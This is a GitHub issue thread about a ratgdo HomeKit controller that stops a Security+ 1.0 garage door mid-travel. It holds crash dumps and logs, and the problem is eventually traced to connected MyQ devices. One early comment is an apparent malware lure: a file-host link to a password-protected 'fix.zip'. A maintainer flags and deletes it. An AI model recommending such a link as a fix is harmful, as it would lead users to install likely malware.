ratgdo/homekit-ratgdo #239: Ratgdo Homekit Sec+ Stops after 1/2 second

cjwyche95, 2024-09-29:
Installed Ratgdo on two garage openers:

1. Newer Sec+ 2.0 door and works perfectly
2. Older Sec+ 1.0 door and it stops after 1/2 second either opening or closing which is baffling me on how to get working correctly.

Wiring triple-checked and is 100%.  Door goes up and down without issue with wall-panel button.  Also have MYQ HomeKit bridge and problem does not occur when using either.  Checked obstruction sensors and all checks out.  Even unlatched the door from the opener trolly and same issue happens.  Switched Ratgdo board and wiring harness with door that works perfectly, but issue still present in same door.  

Any ideas would be appreciated.

Crash info copied below:

Crash information recovered from EEPROM
Crash # 1 at 105125 ms
Restart reason: 254
Exception (0):
epc1=0x00000000 epc2=0x00000000 epc3=0x00000000 excvaddr=0x00000000 depc=0x00000000
>>>stack>>>

ctx: sys

sp: 3ffffb50 end: 3fffffb0
3ffffb50: 3ffffe90 3ffffeb8 0000021c 402343ac 
3ffffb60: 64732d73 3ffffeb8 3fff2970 4023a01e 
3ffffb70: 61725f05 5f04706f 05706374 61636f6c 
3ffffb80: 0000006c 00000000 00000000 00000000 
3ffffb90: 00000000 00000000 00000000 00000000 
3ffffba0: 00000000 00000000 00000000 00000000 
3ffffbb0: 00000000 00000000 00000000 00000000 
3ffffbc0: 00000000 00000000 00000000 00000000 
3ffffbd0: 00000000 00000000 00000000 00000000 
3ffffbe0: 00000000 00000000 00000000 00000000 
3ffffbf0: 00000000 00000000 00000000 00000000 
3ffffc00: 00000000 00000000 00000000 00000000 
3ffffc10: 00000000 00000000 00000000 00000000 
3ffffc20: 00000000 00000000 00000000 00000000 
3ffffc30: 00000000 00000000 00000000 00000000 
3ffffc40: 00000000 00000000 00000000 00000000 
3ffffc50: 00000000 00000000 00000000 00000000 
3ffffc60: 00000000 00000000 00000000 00000000 
3ffffc70: 000c0012 3fff0001 00000e26 3fff0017 
3ffffc80: 3ffffe90 00000001 3fff2970 402374ad 
3ffffc90: 00000000 61725f05 5f04706f 05706374 
3ffffca0: 61636f6c 0000006c 00000000 00000000 
3ffffcb0: 00000000 00000000 00000000 00000000 
3ffffcc0: 00000000 00000000 00000000 00000000 
3ffffcd0: 00000000 00000000 00000000 00000000 
3ffffce0: 00000000 00000000 00000000 00000000 
3ffffcf0: 00000000 00000000 00000000 00000000 
3ffffd00: 00000000 00000000 00000000 00000000 
3ffffd10: 00000000 00000000 00000000 00000000 
3ffffd20: 00000000 00000000 00000000 00000000 
3ffffd30: 00000000 00000000 00000000 00000000 
3ffffd40: 00000000 00000000 00000000 00000000 
3ffffd50: 00000000 00000000 00000000 00000000 
3ffffd60: 00000000 00000000 00000000 00000000 
3ffffd70: 00000000 00000000 00000000 00000000 
3ffffd80: 00000000 00000000 00000000 00000000 
3ffffd90: 00000000 000c0012 00000001 40100854 
3ffffda0: 00007fff 063a2d08 40103a86 00000100 
3ffffdb0: 3ffebaec 7fffffff 50802200 00000001 
3ffffdc0: 00000005 00000000 00000020 40100854 
3ffffdd0: 000094c8 00001299 00000005 40102864 
3ffffde0: 3ffeb235 40105afb 3ffeec48 3ffef690 
3ffffdf0: 00000005 00000000 00000020 40100854 
3ffffe00: ffffffea 063e27f5 00000005 40102864 
3ffffe10: 3ffeb235 40105afb 3ffeec48 00000016 
3ffffe20: 401033ef 3ffeec48 40103a86 00000100 
3ffffe30: ffffffe8 063ec0c7 3ffef5a8 401035cc 
3ffffe40: 3ffebad4 00000000 00000000 40100854 
3ffffe50: ffffffe8 063ec0c7 40103a86 00000100 
3ffffe60: 3ffebad4 7fffffff 50802200 00000001 
3ffffe70: 0000000a 00004208 00000022 3fff471c 
3ffffe80: 3ffe0003 00000002 3fff706c 40239b39 
3ffffe90: 3fffff1a 00000001 3fff706c 40239b39 
3ffffea0: 3fff0000 00000000 00000000 3f000001 
3ffffeb0: 3fff0000 00000000 00000000 40239e4c 
3ffffec0: 00000000 0000000a 3fffff10 4023a1b5 
3ffffed0: 00000000 00000be2 3ffe8f14 3fff2524 
3ffffee0: 3fffad1c 3fffad3a 3fff2970 40237819 
3ffffef0: 00000000 00000000 00000000 00000000 
3fffff00: 00000000 00000000 00000000 4024848e 
3fffff10: 00000000 000a0001 00000000 40237e2e 
3fffff20: 3fffad1c 3fffad3a 3fffad3a 
Incomplete stack trace saved!
<<<stack<<<
No more EEPROM space available to save crash information!

Flash CRC OK
Firmware Version: 1.7.0
Flash CRC: 0x4890B3DC
Flash Length: 604656
Free heap: 11664
Minimum heap: 11664

 HomeKit: [Client 1073711476] Disconnected!
>>> [  97474] HomeKit: [Client 1073711476] Closing client connection
>>> [  97483] HomeKit: [Client 1073709260] Update Characteristics
>>> [  97791] RATGDO: Minimum free heap dropped to 12800
>>> [  98621] HomeKit: Got new client 1073703860: local 192.168.1.167:5556, remote 192.168.1.31:60158
>>> [  98623] HomeKit: Setting Timeout to 500ms
>>> [  98625] HomeKit: [Client 1073703860] Pair Verify Step 1/2
>>> [  99205] HomeKit: Free heap: 12792
>>> [  99206] HomeKit: [Client 1073711036] Pair Verify Step 2/2
>>> [  99208] HomeKit: [Client 1073711036] Found pairing with 9A76D181-3376-4D55-A199-0B5A31419CC2
>>> [  99530] HomeKit: [Client 1073711036] Verification successful, secure session established
>>> [  99530] HomeKit: Free heap: 12792
>>> [  99532] HomeKit: [Client 1073711516] Get Accessories
>>> [ 100167] RATGDO: get active: 0
>>> [ 100169] RATGDO: get current door state: 0
>>> [ 100170] RATGDO: get target door state: 0
>>> [ 100475] RATGDO: get obstruction: 0
>>> [ 100477] RATGDO: get current lock state: 3
>>> [ 100478] RATGDO: get target lock state: 0
!!! [ 101175] HomeKit: [Client 1073711516] socket.write, data_size=536, write_size=20
>>> [ 101177] RATGDO: get light state: Off
!!! [ 101179] HomeKit: [Client 1073711516] The socket is null! (or is closed)
!!! [ 101183] HomeKit: [Client 1073711516] The socket is null! (or is closed)
>>> [ 101191] HomeKit: [Client 1073709260] Get Characteristics
>>> [ 101755] RATGDO: Minimum free heap dropped to 11664
>>> [ 103016] HomeKit: Got new client 1073711644: local 192.168.1.167:5556, remote 192.168.1.75:50866
>>> [ 103017] HomeKit: Setting Timeout to 500ms
>>> [ 103020] HomeKit: [Client 1073711644] Pair Verify Step 1/2
>>> [ 103811] HomeKit: Free heap: 5520
>>> [ 103812] HomeKit: [Client 1073703860] Pair Verify Step 2/2
!!! [ 103814] HomeKit: [Client 1073703860] No pairing for C11713FA-CEB2-42B2-91B0-CC89E697AEF2 found
>>> [ 104120] HomeKit: Free heap: 4576
>>> [ 104122] HomeKit: [Client 1073711036] Get Accessories

SagarChandra07, 2024-09-29:
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

dkerr64, 2024-09-29:
I deleted the post from @ghost as it looks highly suspicious.  The user is deleted.  Who knows what the zip file at the link contains, but I strongly suspect bad things might happen if you unzipped it.

dkerr64, 2024-09-29:
@cjwyche95 Thanks for reporting this.  I've not decoded the stack trace but with lots of zeros it looks like the known problem in MDNS responder.  We're not sure how to fix it, but it usually stabilizes after a reboot.

The log immediately before the crash shows multiple HomeKit clients trying to connect.  What we need is to see a log once the ratgdo has stabilized and then you request to open or close the door.  Can you do that please?  See the README file for the command line to run to capture the logs in real time.

Thanks

cjwyche95, 2024-09-29:
Thanks a ton for deleting the post with the .zip file.  I didn't open it.  I'm a bit of an amateur here with zero coding knowledge, so please forgive if I cause any frustration on your side.  Let me know if this log helps.

Crash information recovered from EEPROM
Crash # 1 at 105125 ms
Restart reason: 254
Exception (0):
epc1=0x00000000 epc2=0x00000000 epc3=0x00000000 excvaddr=0x00000000 depc=0x00000000
>>>stack>>>

ctx: sys

sp: 3ffffb50 end: 3fffffb0
3ffffb50: 3ffffe90 3ffffeb8 0000021c 402343ac 
3ffffb60: 64732d73 3ffffeb8 3fff2970 4023a01e 
3ffffb70: 61725f05 5f04706f 05706374 61636f6c 
3ffffb80: 0000006c 00000000 00000000 00000000 
3ffffb90: 00000000 00000000 00000000 00000000 
3ffffba0: 00000000 00000000 00000000 00000000 
3ffffbb0: 00000000 00000000 00000000 00000000 
3ffffbc0: 00000000 00000000 00000000 00000000 
3ffffbd0: 00000000 00000000 00000000 00000000 
3ffffbe0: 00000000 00000000 00000000 00000000 
3ffffbf0: 00000000 00000000 00000000 00000000 
3ffffc00: 00000000 00000000 00000000 00000000 
3ffffc10: 00000000 00000000 00000000 00000000 
3ffffc20: 00000000 00000000 00000000 00000000 
3ffffc30: 00000000 00000000 00000000 00000000 
3ffffc40: 00000000 00000000 00000000 00000000 
3ffffc50: 00000000 00000000 00000000 00000000 
3ffffc60: 00000000 00000000 00000000 00000000 
3ffffc70: 000c0012 3fff0001 00000e26 3fff0017 
3ffffc80: 3ffffe90 00000001 3fff2970 402374ad 
3ffffc90: 00000000 61725f05 5f04706f 05706374 
3ffffca0: 61636f6c 0000006c 00000000 00000000 
3ffffcb0: 00000000 00000000 00000000 00000000 
3ffffcc0: 00000000 00000000 00000000 00000000 
3ffffcd0: 00000000 00000000 00000000 00000000 
3ffffce0: 00000000 00000000 00000000 00000000 
3ffffcf0: 00000000 00000000 00000000 00000000 
3ffffd00: 00000000 00000000 00000000 00000000 
3ffffd10: 00000000 00000000 00000000 00000000 
3ffffd20: 00000000 00000000 00000000 00000000 
3ffffd30: 00000000 00000000 00000000 00000000 
3ffffd40: 00000000 00000000 00000000 00000000 
3ffffd50: 00000000 00000000 00000000 00000000 
3ffffd60: 00000000 00000000 00000000 00000000 
3ffffd70: 00000000 00000000 00000000 00000000 
3ffffd80: 00000000 00000000 00000000 00000000 
3ffffd90: 00000000 000c0012 00000001 40100854 
3ffffda0: 00007fff 063a2d08 40103a86 00000100 
3ffffdb0: 3ffebaec 7fffffff 50802200 00000001 
3ffffdc0: 00000005 00000000 00000020 40100854 
3ffffdd0: 000094c8 00001299 00000005 40102864 
3ffffde0: 3ffeb235 40105afb 3ffeec48 3ffef690 
3ffffdf0: 00000005 00000000 00000020 40100854 
3ffffe00: ffffffea 063e27f5 00000005 40102864 
3ffffe10: 3ffeb235 40105afb 3ffeec48 00000016 
3ffffe20: 401033ef 3ffeec48 40103a86 00000100 
3ffffe30: ffffffe8 063ec0c7 3ffef5a8 401035cc 
3ffffe40: 3ffebad4 00000000 00000000 40100854 
3ffffe50: ffffffe8 063ec0c7 40103a86 00000100 
3ffffe60: 3ffebad4 7fffffff 50802200 00000001 
3ffffe70: 0000000a 00004208 00000022 3fff471c 
3ffffe80: 3ffe0003 00000002 3fff706c 40239b39 
3ffffe90: 3fffff1a 00000001 3fff706c 40239b39 
3ffffea0: 3fff0000 00000000 00000000 3f000001 
3ffffeb0: 3fff0000 00000000 00000000 40239e4c 
3ffffec0: 00000000 0000000a 3fffff10 4023a1b5 
3ffffed0: 00000000 00000be2 3ffe8f14 3fff2524 
3ffffee0: 3fffad1c 3fffad3a 3fff2970 40237819 
3ffffef0: 00000000 00000000 00000000 00000000 
3fffff00: 00000000 00000000 00000000 4024848e 
3fffff10: 00000000 000a0001 00000000 40237e2e 
3fffff20: 3fffad1c 3fffad3a 3fffad3a 
Incomplete stack trace saved!
<<<stack<<<
No more EEPROM space available to save crash information!

Flash CRC OK
Firmware Version: 1.7.0
Flash CRC: 0x4890B3DC
Flash Length: 604656
Free heap: 11664
Minimum heap: 11664

 HomeKit: [Client 1073711476] Disconnected!
> [  97474] HomeKit: [Client 1073711476] Closing client connection
> [  97483] HomeKit: [Client 1073709260] Update Characteristics
> [  97791] RATGDO: Minimum free heap dropped to 12800
> [  98621] HomeKit: [...]
!!! [ 101175] HomeKit: [Client 1073711516] socket.write, data_size=536, write_size=20
>>> [ 101177] RATGDO: get light state: Off
!!! [ 101179] HomeKit: [Client 1073711516] The socket is null! (or is closed)
!!! [ 101183] HomeKit: [Client 1073711516] The socket is null! (or is closed)
> [ 101191] HomeKit: [Client 1073709260] Get Characteristics
> [ 101755] RATGDO: Minimum free heap dropped to 11664
> [ 103016] HomeKit: Got new client 1073711644: local 192.168.1.167:5556, remote [...]
!!! [ 103814] HomeKit: [Client 1073703860] No pairing for C11713FA-CEB2-42B2-91B0-CC89E697AEF2 found
>>> [ 104120] HomeKit: Free heap: 4576
>>> [ 104122] HomeKit: [Client 1073711036] Get Accessories

dkerr64, 2024-09-29:
That is the same crash log as your first post, you can delete it now... there will be a link at the bottom of the web page to delete.

Do you have Windows, Mac or Linux computer?  If you have Mac or Linux then we have a command you can run that will connect to the device and display the log, it is described [here](https://github.com/ratgdo/homekit-ratgdo?tab=readme-ov-file#monitor-message-log).  If you are able to run that then you should see the message log, and your screen will update with any activity... so with that connected, try and open/close the door (you will see messages appear) and when finished copy the entire log from your screen and post it here.

Thanks

cjwyche95, 2024-09-29:
I'm on a Mac.  Trying to run the command on Terminal, but not understanding what path to choose.  Again, apologies in advance for my lack of basic knowlege.

cjwyche95, 2024-09-29:
I am now running firmware 1.7.1 which shows more logs than 1.7.0, including System Log, Status Log, Reboot Log, and Crash Log.  Would one of those do the job?

dkerr64, 2024-09-29:
> I am now running firmware 1.7.1 which shows more logs than 1.7.0, including System Log, Status Log, Reboot Log, and Crash Log. Would one of those do the job?

Yes, watch the system log tab, it is the same as the command I suggested.

cjwyche95, 2024-09-29:
Okay.  I rebooted the ratgdo, opened the garage with Homekit.  This time it went up halfway and stopped, where it mostly stops after 1/2 second.  Here is the log from the system log tab:

Server uptime (ms): 72190
Firmware version: 1.7.1
Flash CRC: 0xC3762338
Flash length: 625088
Free heap: 15528
Minimum heap: 15320

aracteristics
>>> [  32027] HomeKit: [Client 1073704300] Update Characteristics
>>> [  32050] HomeKit: [Client 1073704300] Get Characteristics
>>> [  32193] HomeKit: [Client 1073704300] Get Characteristics
>>> [  32235] HomeKit: [Client 1073704300] Get Characteristics
>>> [  32277] HomeKit: [Client 1073704300] Get Characteristics
>>> [  32340] HomeKit: [Client 1073704300] Get Characteristics
>>> [  32449] HomeKit: [Client 1073704300] Get Characteristics
>>> [  33845] RATGDO: Free heap dropped to 17624
>>> [  35981] RATGDO: Free heap dropped to 17296
>>> [  37040] RATGDO: Free heap dropped to 16688
>>> [  59335] RATGDO: Client 192.168.1.115 requesting: /auth (method: HTTP_GET)
>>> [  60063] RATGDO: Free heap dropped to 15320
>>> [  66979] RATGDO: status LIGHT: Off
>>> [  66980] HomeKit: [Client 1073704300] Got characteristic 1.18 change event False
>>> [  67055] RATGDO: SSE send to client 192.168.1.115 on channel 0, data: { "garageLightOn": false, "garageMotion": true, "upTime": 67054 }
>>> [  71531] RATGDO: Client 192.168.1.115 requesting: /logs.html (HTTP_GET, type: text/html, length: 1461)
>>> [  71695] RATGDO: Client 192.168.1.115 requesting: /status.json (method: HTTP_GET)
>>> [  71768] RATGDO: JSON length: 817
>>> [  71972] HomeKit: [Client 1073704300] Get Characteristics
>>> [  71999] RATGDO: Motion Cleared
>>> [  72000] RATGDO: SSE send to client 192.168.1.115 on channel 0, data: { "garageMotion": false, "upTime": 71999 }
>>> [  72031] RATGDO: Client 192.168.1.115 requesting: /showrebootlog (method: HTTP_GET)
>>> [  72072] RATGDO: Client 192.168.1.115 requesting: /crashlog (method: HTTP_GET)
>>> [  72073] RATGDO: Request to display crash log...
>>> [  72169] RATGDO: Client 192.168.1.115 requesting: /rest/events/subscribe (method: HTTP_GET)
>>> [  72171] RATGDO: SSE Subscription for client bba489ab-0ef4-4ebf-8b66-923023ea4890 with IP 192.168.1.115: event bus location: /rest/events/1, Total subscribed: 2
>>> [  72189] RATGDO: Client 192.168.1.115 requesting: /showlog (method: HTTP_GET)
>>> [  72639] RATGDO: Client 192.168.1.115 listening for SSE events on channel 1

>>> [  78850] HomeKit: [Client 1073704300] Update Characteristics

>>> [  78954] HomeKit: [Client 1073704300] Get Characteristics

>>> [  79138] HomeKit: [Client 1073704300] Get Characteristics

>>> [  79335] HomeKit: [Client 1073704300] Get Characteristics

>>> [  79358] RATGDO: get target door state: 1

>>> [  79366] RATGDO: get current door state: 1

>>> [  79375] RATGDO: get obstruction: 0

>>> [  86339] RATGDO: Free heap dropped to 15024

>>> [  90944] HomeKit: [Client 1073704300] Get Characteristics

>>> [  91018] RATGDO: get light state: Off

>>> [  98897] HomeKit: [Client 1073704300] Update Characteristics

>>> [  98907] RATGDO: set door state: 0

>>> [  98913] RATGDO: open door request

>>> [  98959] HomeKit: [Client 1073704300] Update Characteristics

>>> [  99197] RATGDO: set door state: 0

>>> [  99205] RATGDO: open door request

>>> [  99231] HomeKit: [Client 1073704300] Update Characteristics

>>> [  99239] RATGDO: set door state: 0

>>> [  99245] RATGDO: open door request

>>> [  99290] HomeKit: [Client 1073704300] Update Characteristics

>>> [  99301] RATGDO: set door state: 0

>>> [  99317] RATGDO: open door request

>>> [  99350] RATGDO: sending DOOR button press

>>> [  99610] RATGDO: sending DOOR button release

>>> [  99947] RATGDO: status LIGHT: On

cjwyche95, 2024-10-05:
Anything else needed to help resolve this issue?  Also, should I delete the logs I've uploaded?  Appreciate your assistance.

dkerr64, 2024-10-05:
Sorry for going quiet. I am traveling so have not been able to win this yet.

dkerr64, 2024-10-06:
@cjwyche95 yes you can delete the logs that you uploaded here.

Looking at the most recent log you posted, can you tell me at exactly which point you requested the door open... it will be somewhere after timestamp 98000.  And are you triggering the request by using Apple Home or by using the door open button on the web interface.  Thanks.

cjwyche95, 2024-10-06:
Not sure how to pinpoint exactly when I requested the door to open per the log... I can tell you it was within a minute after a reboot, and I requested it through HomeKit.  I had to close the door through the wall button after since it always gets stuck after requesting through HomeKit.

dkerr64, 2024-10-06:
ok, so I think it occurs at 98 seconds (timestamp 98897) where HomeKit is requesting an update characteristic to set door state to 0 (zero equals open, one equals close).  It is interesting that this is sent four times in the space of half a second.  The actual request to open the door is triggered at 99350 with a press and release of the sec+ 1.0 door button.

But then your log ends... is there anything more logged?  I am not seeing anything that would notify when the door finished opening.

dkerr64, 2024-10-06:
@mitchjs looping you into this discussion... anything you can assist with?

cjwyche95, 2024-10-06:
I just rebooted it again with the logs below.  This time, this garage door opened all the way without stopping via Homekit (not the button on the wall).  I requested to close the door throught Homekit right after, and it stopped and went back up after 1/2 second.

_____ _____ _____ _____ ____  _____
| __  |  _  |_   _|   __|    \|     |
|    -|     | | | |  |  |  |  |  |  |
|__|__|__|__| |_| |_____|____/|_____|
          
 for HomeKit

Garage Door 0CCDDC Logs

System LogStatusReboot LogCrash Log
Current server message log...

Server upTime:       0 days 00 hrs 05 mins 48 secs
Server uptime (ms): 348544
Firmware version: 1.7.1
Flash CRC: 0xC3762338
Flash length: 625088
Free heap: 14440
Minimum heap: 9576

est
>>> [ 305051] HomeKit: [Client 1073705492] Update Characteristics
>>> [ 305054] RATGDO: set door state: 1
>>> [ 305054] RATGDO: close door request
>>> [ 305077] HomeKit: [Client 1073705492] Update Characteristics
>>> [ 305079] RATGDO: set door state: 1
>>> [ 305079] RATGDO: close door request
>>> [ 305106] RATGDO: 0x3A val upper nible not 5: 4C
>>> [ 305283] RATGDO: sending DOOR button release
>>> [ 305392] RATGDO: sending DOOR button release
>>> [ 305442] RATGDO: sending DOOR button press
>>> [ 305754] RATGDO: sending DOOR button release
>>> [ 305804] RATGDO: sending DOOR button release
>>> [ 305854] RATGDO: sending DOOR button press
>>> [ 306153] RATGDO: sending DOOR button release
>>> [ 306203] RATGDO: sending DOOR button release
>>> [ 332007] HomeKit: [Client 1073705492] Get Characteristics
>>> [ 332017] RATGDO: get target door state: 0
>>> [ 332018] RATGDO: get current door state: 0
>>> [ 332018] RATGDO: get obstruction: 0
>>> [ 332942] HomeKit: [Client 1073705492] Get Characteristics
>>> [ 332961] RATGDO: get target door state: 0
>>> [ 332962] RATGDO: get current door state: 0
>>> [ 332963] RATGDO: get obstruction: 0
>>> [ 347038] RATGDO: Client 192.168.1.115 requesting: /logs.html (HTTP_GET, type: text/html, length: 1461)
>>> [ 347420] RATGDO: Client 192.168.1.115 requesting: /status.json (method: HTTP_GET)
>>> [ 347492] RATGDO: JSON length: 815
>>> [ 347499] RATGDO: Client 192.168.1.115 requesting: /showrebootlog (method: HTTP_GET)
>>> [ 348117] HomeKit: [Client 1073705492] Get Characteristics
>>> [ 348198] RATGDO: Client 192.168.1.115 requesting: /crashlog (method: HTTP_GET)
>>> [ 348199] RATGDO: Request to display crash log...
>>> [ 348523] RATGDO: Client 192.168.1.115 requesting: /rest/events/subscribe (method: HTTP_GET)
>>> [ 348524] RATGDO: SSE Subscription for client a2ccce64-d111-44e8-8327-57345518e337 with IP 192.168.1.115: event bus location: /rest/events/1, Total subscribed: 2
>>> [ 348543] RATGDO: Client 192.168.1.115 requesting: /showlog (method: HTTP_GET)
>>> [ 349325] RATGDO: Client 192.168.1.115 listening for SSE events on channel 1

>>> [ 360228] RATGDO: Client 192.168.1.115 requesting: /status.json (method: HTTP_GET)

>>> [ 360602] RATGDO: JSON length: 816

cjwyche95, 2024-10-06:
Rebooted RATGDO again, requesting to close the garage door from Homekit, but it stopped and reversed itself again.  Below is a copy of this log.

Current server message log...

Server upTime:       0 days 00 hrs 02 mins 13 secs
Server uptime (ms): 133097
Firmware version: 1.7.1
Flash CRC: 0xC3762338
Flash length: 625088
Free heap: 14736
Minimum heap: 12672

DO: sending DOOR button release
>>> [  82527] RATGDO: sending DOOR button release
>>> [  87056] RATGDO: Motion Cleared
>>> [  87056] HomeKit: [Client 1073704692] Got characteristic 1.21 change event False
>>> [  87057] RATGDO: SSE send to client 192.168.1.115 on channel 0, data: { "garageMotion": false, "upTime": 87057 }
>>> [  88071] RATGDO: Free heap dropped to 14832
>>> [  94140] RATGDO: Free heap dropped to 14480
>>> [  94242] HomeKit: [Client 1073704692] Get Characteristics
>>> [  95151] RATGDO: Free heap dropped to 12672
>>> [ 105834] RATGDO: Client 192.168.1.115 not listening, remove SSE subscription. Total subscribed: 0
>>> [ 109084] RATGDO: Client 192.168.1.115 requesting: /logs.html (HTTP_GET, type: text/html, length: 1461)
>>> [ 121669] RATGDO: Client 192.168.1.115 requesting: /logs.html (HTTP_GET, type: text/html, length: 1461)
>>> [ 130951] RATGDO: Client 192.168.1.115 requesting: /status.json (method: HTTP_GET)
>>> [ 131023] RATGDO: JSON length: 817
>>> [ 131107] RATGDO: Client 192.168.1.115 requesting: /rest/events/subscribe (method: HTTP_GET)
>>> [ 131109] RATGDO: SSE Subscription for client c7c5299b-2666-400a-b9dd-63b60265127a with IP 192.168.1.115: event bus location: /rest/events/0, Total subscribed: 1
>>> [ 131529] RATGDO: Client 192.168.1.115 listening for SSE events on channel 0
>>> [ 132102] RATGDO: Client 192.168.1.115 requesting: /status.json (method: HTTP_GET)
>>> [ 132175] RATGDO: JSON length: 817
>>> [ 132182] RATGDO: Client 192.168.1.115 requesting: /showrebootlog (method: HTTP_GET)
>>> [ 132918] RATGDO: Client 192.168.1.115 requesting: /crashlog (method: HTTP_GET)
>>> [ 132919] RATGDO: Request to display crash log...
>>> [ 133073] RATGDO: Client 192.168.1.115 requesting: /rest/events/subscribe (method: HTTP_GET)
>>> [ 133074] RATGDO: SSE Subscription for client 8ee56a67-80cb-45de-9cdd-34fdb33f82a6 with IP 192.168.1.115: event bus location: /rest/events/1, Total subscribed: 2
>>> [ 133095] RATGDO: Client 192.168.1.115 requesting: /showlog (method: HTTP_GET)
>>> [ 133554] RATGDO: Client 192.168.1.115 listening for SSE events on channel 1

cjwyche95, 2024-10-06:
Realize this is a lot of logs.... hope this is helpful to diagnose the problem.

dkerr64, 2024-10-07:
Please don't keep rebooting the device, it doesn't help.  And you need to open up the system logs page before you start to do any testing... you can watch the log messages appear as you request open/close.

Your log shows multiple door press/release actions and that feels odd.  Not sure why it is occurring.  The Sec+ 1.0 support was provided by @mitchjs so we really need his help to diagnose.

mitchjs, 2024-10-07:
sorry guys, been busy, now doing hurricane prep...
@cjwyche95, what kind of wall plate do you have?

cjwyche95, 2024-10-07:
It is the Liftmaster 889LM MyQ Control Panel.

mitchjs, 2024-10-07:
@cjwyche95, also did you make any changes to "settings"? specifically the close door delay.

cjwyche95, 2024-10-07:
No, no changes were made to the close door delay.

mitchjs, 2024-10-07:
@cjwyche95 , i use the 889LM
and no isssues (of course)
for sure test it with the web page buttons... lets keep homekit out of it for a bit

cjwyche95, 2024-10-07:
We'll do. Thank you and I'll keep you updated later this week.

cjwyche95, 2024-10-10:
Issue fixed.  Turns out, MYQ related devices connected to the garage door was causing the problem.  Unplugged all things MYQ and all works perfectly!  Problem solved.  Guess I should have known to try that a while back.

mitchjs, 2024-10-10:
@cjwyche95, out of curiosity what did/do you have connected? and how they connected? to the 2 wires for the wall plate (spot where ratgdo connected). maybe the could be reproduced and i could look at the raw messages coming into the ratgdo
my setup is super simple, the gdo and myq digital wall plate (889LM) and that connects to the MYQ internet gateway

cjwyche95, 2024-10-11:
I had the MyQ HomeKit bridge and the wireless hub and sensor still running on the door itself.  After unplugging all, the problem disappeared.  Been working perfectly since.  My setup is exactly like yours now, except no MyQ internet gateway.

mitchjs, 2024-10-12:
@cjwyche95, if you had the homeKit bridge why need ratgdo? just wondering

cjwyche95, 2024-10-12:
The Chamberlain HomeKit Bridge had lots of issues where a reboot was needed often.  When it worked and was connected it was fine... but frustrating.  Chamberlain also discontinued the product and no longer supported it, so it was sure to stop working eventually.  I see the ratgdo as a more permanent solution.  I still will have the HomeKit bridge as a backup if Ratgdo has issues.

dkerr64, 2024-10-12:
Thank you for reporting this.  We should add to documentation/readme a caution about having other devices connected to the garage door.

closed 2024-10-12 by cjwyche95